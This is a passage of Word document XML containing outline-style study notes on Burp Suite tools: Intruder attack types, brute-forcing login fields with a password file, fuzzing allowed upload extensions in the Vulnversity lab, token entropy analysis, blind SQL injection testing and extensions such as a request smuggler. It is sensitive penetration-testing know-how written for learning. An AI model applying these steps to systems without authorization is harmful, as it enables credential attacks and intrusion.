    <w:p w14:paraId="19C59643" w14:textId="128EADAD" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Cluster bomb – multiple payload sets (one per position selected) and iterate through all combinations of the payload lists provided. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A98085" w14:textId="34AC4BED" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Fuzzdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> SQLi platform detection list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E993B8" w14:textId="03464629" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Positions subtab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE43D3" w14:textId="714987F0" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00BB07B0" w:rsidRPr="0084205E">
        <w:t>niper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914D742" w14:textId="6E08C749" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Choose positions to enter payloads (email and password), must be between quotes – do not include the quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD72F68" w14:textId="5ECCDFC1" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Payloads</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> subtab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B0DDA1" w14:textId="42E0EC68" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Payload options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA3882" w14:textId="3EBFC0A6" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E9557" w14:textId="6AF7EB0A" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Choose password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400DCBD" w14:textId="78B99164" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uncheck URL encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BA557" w14:textId="3A849F25" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012C77A" w14:textId="1A31C772" w:rsidR="008F294B" w:rsidRPr="0084205E" w:rsidRDefault="008F294B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Payload for first 200 code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD30AB" w14:textId="597D9C6B" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TO CHECK OK’d FILE EXTENSIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E6AD0E" w14:textId="76F3ECC2" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vulnversity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0EB8C" w14:textId="26B53800" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create wordlist with extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132240E" w14:textId="466D17C0" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload innocent file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6234ECBA" w14:textId="47CD0536" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777FA043" w14:textId="47AB2006" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Send to intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF871A2" w14:textId="7D680334" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sniper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79F45C" w14:textId="5730E77E" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4A0773" w14:textId="5C443217" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filename extension “Add”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F427525" w14:textId="342DBB77" w:rsidR="00620994" w:rsidRPr="0084205E" w:rsidRDefault="00620994" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run Attack to see what extensions are allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169121B1" w14:textId="68A6E97B" w:rsidR="00BF290D" w:rsidRPr="0084205E" w:rsidRDefault="00BF290D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sequencer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658080C" w14:textId="5F760F34" w:rsidR="00BF290D" w:rsidRPr="0084205E" w:rsidRDefault="00BF290D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Test randomness of session tokens, anti-CSRF tokens, password reset tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F321661" w14:textId="69BE5727" w:rsidR="00BF290D" w:rsidRPr="0084205E" w:rsidRDefault="00BF290D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>http history subtab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46225014" w14:textId="477CC644" w:rsidR="00BF290D" w:rsidRPr="0084205E" w:rsidRDefault="00BF290D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dig for response which issues a cookie “set-cookie”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CEEBA8" w14:textId="1172C95C" w:rsidR="00597B39" w:rsidRPr="0084205E" w:rsidRDefault="00597B39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">be sure to check for request containing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cookieconsent_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">=dismiss and response with set-cookie containing repeat in {} below body </w:t>
      </w:r>
      <w:r w:rsidR="00BB3004" w:rsidRPr="0084205E">
        <w:t>of headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA38A5C" w14:textId="562F234C" w:rsidR="00BB3004" w:rsidRPr="0084205E" w:rsidRDefault="00BB3004" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>analyze now button should light up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EEAE67" w14:textId="2E13D1DA" w:rsidR="0016073F" w:rsidRPr="0084205E" w:rsidRDefault="0016073F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>send to sequencer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49665111" w14:textId="7A9632E3" w:rsidR="0016073F" w:rsidRPr="0084205E" w:rsidRDefault="0016073F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>start live capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B37FE" w14:textId="00E51F9B" w:rsidR="0016073F" w:rsidRPr="0084205E" w:rsidRDefault="0016073F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>capture ~10k requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA3221" w14:textId="43C8962C" w:rsidR="0016073F" w:rsidRPr="0084205E" w:rsidRDefault="0016073F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>pause and analyze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0135DBBF" w14:textId="4A77D09B" w:rsidR="0016073F" w:rsidRPr="0084205E" w:rsidRDefault="0016073F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>measured entropy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AA0D9" w14:textId="6F1AD101" w:rsidR="0016073F" w:rsidRPr="0084205E" w:rsidRDefault="00597B39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>usable bits of entropy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D10028" w14:textId="73059CB8" w:rsidR="00597B39" w:rsidRPr="0084205E" w:rsidRDefault="00597B39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>normalize dataset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395A3981" w14:textId="3D2C96FD" w:rsidR="00564EAC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Decoder and Comparer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A93C47" w14:textId="02CFEFDA" w:rsidR="004C62AC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Comparer is good for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E31248E" w14:textId="32B45FAB" w:rsidR="004C62AC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Username enumeration conditions, compare responses to failed logins, subtle response differences, intruder attacks, </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">comparing site maps, proxy history for application behavior </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>(reveal access control issues)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC6F086" w14:textId="65DFD10B" w:rsidR="004C62AC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Testing for blind SQL injection bugs using Boolean condition injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56638F73" w14:textId="0EFF7521" w:rsidR="004C62AC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Words or bytes comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF0DBD" w14:textId="793D30E0" w:rsidR="004C62AC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Smart</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> decode – magic function where it will automatically attempt to decode input provided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8902ED" w14:textId="6E722B0B" w:rsidR="004C62AC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Extender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA31B8" w14:textId="7A624C3A" w:rsidR="004C62AC" w:rsidRPr="0084205E" w:rsidRDefault="004C62AC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Logger++ - enhanced logging to all requests and responses from all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28133EBD" w14:textId="585C782B" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Request smuggler – allows attempt to smuggle requests to backends servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7AF3B8" w14:textId="1BD74B83" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authorize – authentication testing in web app tests. Typically revolve around navigating to restricted pages or issuing restricted GET requests with the session cookies of low-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privleged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D789E8F" w14:textId="687CA1D7" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Burp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>teams</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> server – allows for collaboration on a burp project amongst team members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059B337" w14:textId="6DB0A80E" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Retire.js – adds scanner checks for outdated JS libraries that contain vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C142D" w14:textId="77A53F91" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>J2EEScan – adds scanner test coverage for J2EE applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19849BA2" w14:textId="12E3A709" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Request Timer – captures response time for requests made by all burp tools, useful for discovering timing attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BD14C" w14:textId="0E195D89" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Need </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Jython</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> beforehand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E25F781" w14:textId="7F079A72" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Extender options tab</w:t>
      </w:r>
    </w:p>
